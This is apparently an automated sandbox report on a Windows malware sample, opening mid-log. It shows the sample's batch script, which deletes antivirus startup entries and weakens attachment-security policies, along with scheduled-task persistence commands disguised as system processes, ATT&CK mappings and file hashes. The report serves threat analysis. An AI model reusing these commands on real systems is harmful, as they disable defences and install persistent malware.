Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )
              4⤵
                PID:5108
        • C:\Users\Admin\AppData\Local\Temp\8EFA.exe
          C:\Users\Admin\AppData\Local\Temp\8EFA.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          PID:2724
          • C:\Users\Admin\AppData\Local\Temp\8EFA.exe
            C:\Users\Admin\AppData\Local\Temp\8EFA.exe
            2⤵
            • Executes dropped EXE
            PID:4312
        • C:\Users\Admin\AppData\Local\Temp\942B.exe
          C:\Users\Admin\AppData\Local\Temp\942B.exe
          1⤵
          • Executes dropped EXE
          PID:3092
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3092 -s 732
            2⤵
            • Program crash
            • Suspicious use of AdjustPrivilegeToken
            PID:2112
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3092 -s 748
            2⤵
            • Program crash
            • Suspicious use of AdjustPrivilegeToken
            PID:2784
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3092 -s 716
            2⤵
            • Program crash
            • Suspicious use of AdjustPrivilegeToken
            PID:3764
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3092 -s 892
            2⤵
            • Program crash
            PID:3224
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3092 -s 860
            2⤵
            • Suspicious use of NtCreateProcessExOtherParentProcess
            • Program crash
            • Suspicious use of AdjustPrivilegeToken
            PID:4064
        • C:\Users\Admin\AppData\Local\Temp\9B60.exe
          C:\Users\Admin\AppData\Local\Temp\9B60.exe
          1⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:2204
        • C:\Users\Admin\AppData\Local\Temp\A0B0.exe
          C:\Users\Admin\AppData\Local\Temp\A0B0.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:2644
        • C:\Windows\SysWOW64\explorer.exe
          C:\Windows\SysWOW64\explorer.exe
          1⤵
            PID:3412
          • C:\Windows\explorer.exe
            C:\Windows\explorer.exe
            1⤵
              PID:2792
            • C:\Windows\SysWOW64\explorer.exe
              C:\Windows\SysWOW64\explorer.exe
              1⤵
                PID:2980
              • C:\Windows\explorer.exe
                C:\Windows\explorer.exe
                1⤵
                  PID:1300
                • C:\Windows\SysWOW64\explorer.exe
                  C:\Windows\SysWOW64\explorer.exe
                  1⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3224
                • C:\Windows\explorer.exe
                  C:\Windows\explorer.exe
                  1⤵
                    PID:4092
                  • C:\Windows\SysWOW64\explorer.exe
                    C:\Windows\SysWOW64\explorer.exe
                    1⤵
                      PID:2440
                    • C:\Windows\explorer.exe
                      C:\Windows\explorer.exe
                      1⤵
                        PID:3452
                      • C:\Windows\SysWOW64\explorer.exe
                        C:\Windows\SysWOW64\explorer.exe
                        1⤵
                          PID:2136
                        • C:\Windows\system32\schtasks.exe
                          schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\odt\explorer.exe'" /rl HIGHEST /f
                          1⤵
                          • Process spawned unexpected child process
                          • Creates scheduled task(s)
                          PID:4800
                        • C:\Windows\system32\schtasks.exe
                          schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\PerfLogs\ShellExperienceHost.exe'" /rl HIGHEST /f
                          1⤵
                          • Process spawned unexpected child process
                          • Creates scheduled task(s)
                          PID:4944
                        • C:\Windows\system32\schtasks.exe
                          schtasks.exe /create /tn "8563" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Temp\8563.exe'" /rl HIGHEST /f
                          1⤵
                          • Process spawned unexpected child process
                          • Creates scheduled task(s)
                          PID:188
                        • C:\Windows\system32\schtasks.exe
                          schtasks.exe /create /tn "WerFault" /sc ONLOGON /tr "'C:\Windows\SysWOW64\WimBootCompress\WerFault.exe'" /rl HIGHEST /f
                          1⤵
                          • Process spawned unexpected child process
                          • Creates scheduled task(s)
                          PID:2436
                        • C:\Windows\system32\schtasks.exe
                          schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Default\Recent\csrss.exe'" /rl HIGHEST /f
                          1⤵
                          • Process spawned unexpected child process
                          • Creates scheduled task(s)
                          PID:2992
                        • C:\Windows\system32\schtasks.exe
                          schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\PerfLogs\OfficeClickToRun.exe'" /rl HIGHEST /f
                          1⤵
                          • Process spawned unexpected child process
                          • Creates scheduled task(s)
                          PID:5096

                        Network

                        MITRE ATT&CK Matrix ATT&CK v6

                        Initial Access

                        Execution

                        Scheduled Task

                        1
                        T1053

                        Persistence

                        Modify Existing Service

                        1
                        T1031

                        Registry Run Keys / Startup Folder

                        1
                        T1060

                        Scheduled Task

                        1
                        T1053

                        Privilege Escalation

                        Scheduled Task

                        1
                        T1053

                        Defense Evasion

                        Modify Registry

                        3
                        T1112

                        Disabling Security Tools

                        1
                        T1089

                        Virtualization/Sandbox Evasion

                        1
                        T1497

                        Install Root Certificate

                        1
                        T1130

                        Credential Access

                        Credentials in Files

                        3
                        T1081

                        Discovery

                        Query Registry

                        4
                        T1012

                        Virtualization/Sandbox Evasion

                        1
                        T1497

                        System Information Discovery

                        4
                        T1082

                        Peripheral Device Discovery

                        1
                        T1120

                        Lateral Movement

                        Collection

                        Data from Local System

                        3
                        T1005

                        Exfiltration

                        Command and Control

                        Web Service

                        1
                        T1102

                        Impact

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\ProgramData\Data\Database.exe
                          MD5

                          30f0a5fe731fd2735b8c196fd0fe91cf

                          SHA1

                          2eb63724fd11bf8e082bcd99301654111ad0d831

                          SHA256

                          13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                          SHA512

                          acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                          Download Submit
                        • C:\ProgramData\Data\Database.exe
                          MD5

                          30f0a5fe731fd2735b8c196fd0fe91cf

                          SHA1

                          2eb63724fd11bf8e082bcd99301654111ad0d831

                          SHA256

                          13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                          SHA512

                          acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                          Download Submit
                        • C:\ProgramData\Data\Database.exe
                          MD5

                          30f0a5fe731fd2735b8c196fd0fe91cf

                          SHA1

                          2eb63724fd11bf8e082bcd99301654111ad0d831

                          SHA256

                          13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                          SHA512

                          acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                          Download Submit
                        • C:\ProgramData\Data\Database.exe
                          MD5

                          30f0a5fe731fd2735b8c196fd0fe91cf

                          SHA1

                          2eb63724fd11bf8e082bcd99301654111ad0d831

                          SHA256

                          13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                          SHA512

                          acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                          Download Submit
                        • C:\ProgramData\Data\Database.exe
                          MD5

                          30f0a5fe731fd2735b8c196fd0fe91cf

                          SHA1

                          2eb63724fd11bf8e082bcd99301654111ad0d831

                          SHA256

                          13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                          SHA512

                          acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                          Download Submit
                        • C:\ProgramData\Data\Database.exe
                          MD5

                          30f0a5fe731fd2735b8c196fd0fe91cf

                          SHA1

                          2eb63724fd11bf8e082bcd99301654111ad0d831

                          SHA256

                          13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                          SHA512

                          acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                          Download Submit
                        • C:\ProgramData\Data\Database.exe
                          MD5

                          30f0a5fe731fd2735b8c196fd0fe91cf

                          SHA1

                          2eb63724fd11bf8e082bcd99301654111ad0d831

                          SHA256

                          13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                          SHA512

                          acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                          Download Submit
                        • C:\ProgramData\Data\Database.exe
                          MD5

                          30f0a5fe731fd2735b8c196fd0fe91cf

                          SHA1

                          2eb63724fd11bf8e082bcd99301654111ad0d831

                          SHA256

                          13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                          SHA512

                          acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                          Download Submit
                        • C:\ProgramData\Data\Database.exe
                          MD5

                          30f0a5fe731fd2735b8c196fd0fe91cf

                          SHA1

                          2eb63724fd11bf8e082bcd99301654111ad0d831

                          SHA256

                          13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                          SHA512

                          acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                          Download Submit
                        • C:\ProgramData\Data\Database.exe
                          MD5

                          30f0a5fe731fd2735b8c196fd0fe91cf

                          SHA1

                          2eb63724fd11bf8e082bcd99301654111ad0d831

                          SHA256

                          13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                          SHA512

                          acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                          Download Submit
                        • C:\ProgramData\Data\Database.exe
                          MD5

                          30f0a5fe731fd2735b8c196fd0fe91cf

                          SHA1

                          2eb63724fd11bf8e082bcd99301654111ad0d831

                          SHA256

                          13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                          SHA512

                          acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                          Download Submit
                        • C:\ProgramData\Data\Database.exe
                          MD5

                          30f0a5fe731fd2735b8c196fd0fe91cf

                          SHA1

                          2eb63724fd11bf8e082bcd99301654111ad0d831

                          SHA256

                          13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                          SHA512

                          acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                          Download Submit
                        • C:\ProgramData\Data\Database.exe
                          MD5

                          30f0a5fe731fd2735b8c196fd0fe91cf

                          SHA1

                          2eb63724fd11bf8e082bcd99301654111ad0d831

                          SHA256

                          13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                          SHA512

                          acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                          Download Submit
                        • C:\ProgramData\Data\install.exe
                          MD5

                          3319cb474eaa2f3812956b271ff29635

                          SHA1

                          74fbed926e8de14fa5eb6a5a47fb873def72fb81

                          SHA256

                          79d27a1a2980812c98a473a189158fcc2f77ca82e5720f9e060ff81e5842f27a

                          SHA512

                          c7139cc744cbafd9618638e7d68e4464da7a6052c10a1906bf7f5ede49128c4f3a05bc49daefbd8a19393887a78a5ca0f7efb3eb06889af9dae0d104870b7347

                          Download Submit
                        • C:\ProgramData\Data\install.exe
                          MD5

                          3319cb474eaa2f3812956b271ff29635

                          SHA1

                          74fbed926e8de14fa5eb6a5a47fb873def72fb81

                          SHA256

                          79d27a1a2980812c98a473a189158fcc2f77ca82e5720f9e060ff81e5842f27a

                          SHA512

                          c7139cc744cbafd9618638e7d68e4464da7a6052c10a1906bf7f5ede49128c4f3a05bc49daefbd8a19393887a78a5ca0f7efb3eb06889af9dae0d104870b7347

                          Download Submit
                        • C:\ProgramData\Runtimebroker.exe
                          MD5

                          e06bf78c03d9593b593cc3ab09794d29

                          SHA1

                          7e62e808689f789c153c895c8061a44503bfccb2

                          SHA256

                          e097a312c40c9422a674553bad792cb07acebf24a864766c1b88e62609756177

                          SHA512

                          330b30933e375806c8e0ab1b94872bd2352c9f0a16d8852e735a6265a4da21b7bc4151ba04d51398008781e83993a6ef0b2d120b9dab1cf46d66562b9d4d8d45

                          Download Submit
                        • C:\ProgramData\Runtimebroker.exe
                          MD5

                          e06bf78c03d9593b593cc3ab09794d29

                          SHA1

                          7e62e808689f789c153c895c8061a44503bfccb2

                          SHA256

                          e097a312c40c9422a674553bad792cb07acebf24a864766c1b88e62609756177

                          SHA512

                          330b30933e375806c8e0ab1b94872bd2352c9f0a16d8852e735a6265a4da21b7bc4151ba04d51398008781e83993a6ef0b2d120b9dab1cf46d66562b9d4d8d45

                          Download Submit
                        • C:\ProgramData\Systemd\HostData.exe
                          MD5

                          cbf26c74a0a12b5f17ba7596ff6ad19f

                          SHA1

                          6dc733432c290f1fbf5ddda2571b7f538445202b

                          SHA256

                          095094f579ee811aa3da840541b94bca89a4c899e2236a0995ee655261a68983

                          SHA512

                          8a562fc0920cb02fe161c359b8fe73ff02e26c9605f970c6f511ad933fe164eceaec8279fdfe3d198837f2f9980a986f82508ee758a1632bcd7ab041152db11b

                          Download Submit
                        • C:\ProgramData\Systemd\HostData.exe
                          MD5

                          cbf26c74a0a12b5f17ba7596ff6ad19f

                          SHA1

                          6dc733432c290f1fbf5ddda2571b7f538445202b

                          SHA256

                          095094f579ee811aa3da840541b94bca89a4c899e2236a0995ee655261a68983

                          SHA512

                          8a562fc0920cb02fe161c359b8fe73ff02e26c9605f970c6f511ad933fe164eceaec8279fdfe3d198837f2f9980a986f82508ee758a1632bcd7ab041152db11b

                          Download Submit
                        • C:\ProgramData\Systemd\config.json
                          MD5

                          a285ac140c8c6806223bfdc02302173e

                          SHA1

                          06ca61cae058c568860858e49615d04dc4a8820d

                          SHA256

                          36d5713cc13ea15449ab8defc943e42cc657b503a79f0859600ea275598441eb

                          SHA512

                          f82eae8304aa9ba504eba0e96468fdac08420b0e158c3263a4f47474b02fb5f751b1bd2335e71a33341d81a495083c7dd8e0479e2c48dbaf6a3f7fefb9f4054b

                          Download Submit
                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                          MD5

                          c558fdaa3884f969f1ec904ae7bbd991

                          SHA1

                          b4f85d04f6bf061a17f52c264c065b786cfd33ff

                          SHA256

                          3e2559b6ca355d011b05b1fcf35ed8b2375586fe6bb01bc367f24eb8ac82975e

                          SHA512

                          6523c778fd9fab0085fafe7b4049e591403865212cc25109cb11f11584c7258bc15e0a5524d089d0f662151b22f3f8e6f871091cec57064c69a9a95903f9e7d4

                          Download Submit
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          MD5

                          968b0bb38e66c0fb89c7dbe8d9d3eddb

                          SHA1

                          728a021af94e4e1c54eabd0f5809dc1c9a93e737

                          SHA256

                          dbdd714d26d37f247ae9cb43fa0835cfb7a8c7131717991ff835ee49ca944927

                          SHA512

                          f7a155bad79bd28cdbcd301ed1ff52b3e71d643656bdd2eb485aa7bc55c726a492fda6d51574b8c225b3b946ab10c1fca778fda012c1e3e60a74909401c25638

                          Download Submit
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          MD5

                          a146e5dea51bdd0f757d04b4f64bf2bb

                          SHA1

                          432125e6ba72a10f1102e22a7bdec573256735d8

                          SHA256

                          464f4d869e5e5c8a16d84234e4182ae6633f9ccd35cc4352855da417a2ffb61d

                          SHA512

                          f82f0fd65c94d3901a54878bb62aad2acbd813f57e9e1cc3f555da404fb20c7ebc702234cc097ed39f784f2acd0e36df85ea0b18277410783905a8666492cf11

                          Download Submit
                        • C:\Users\Admin\AppData\Local\Temp\7CC7.exe
                          MD5

                          e987477b0d14b6d7075f0105aa28ba92

                          SHA1

                          54bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab

                          SHA256

                          4fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b

                          SHA512

                          bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68

                          Download Submit
                        • C:\Users\Admin\AppData\Local\Temp\7CC7.exe
                          MD5

                          e987477b0d14b6d7075f0105aa28ba92

                          SHA1

                          54bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab

                          SHA256

                          4fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b

                          SHA512

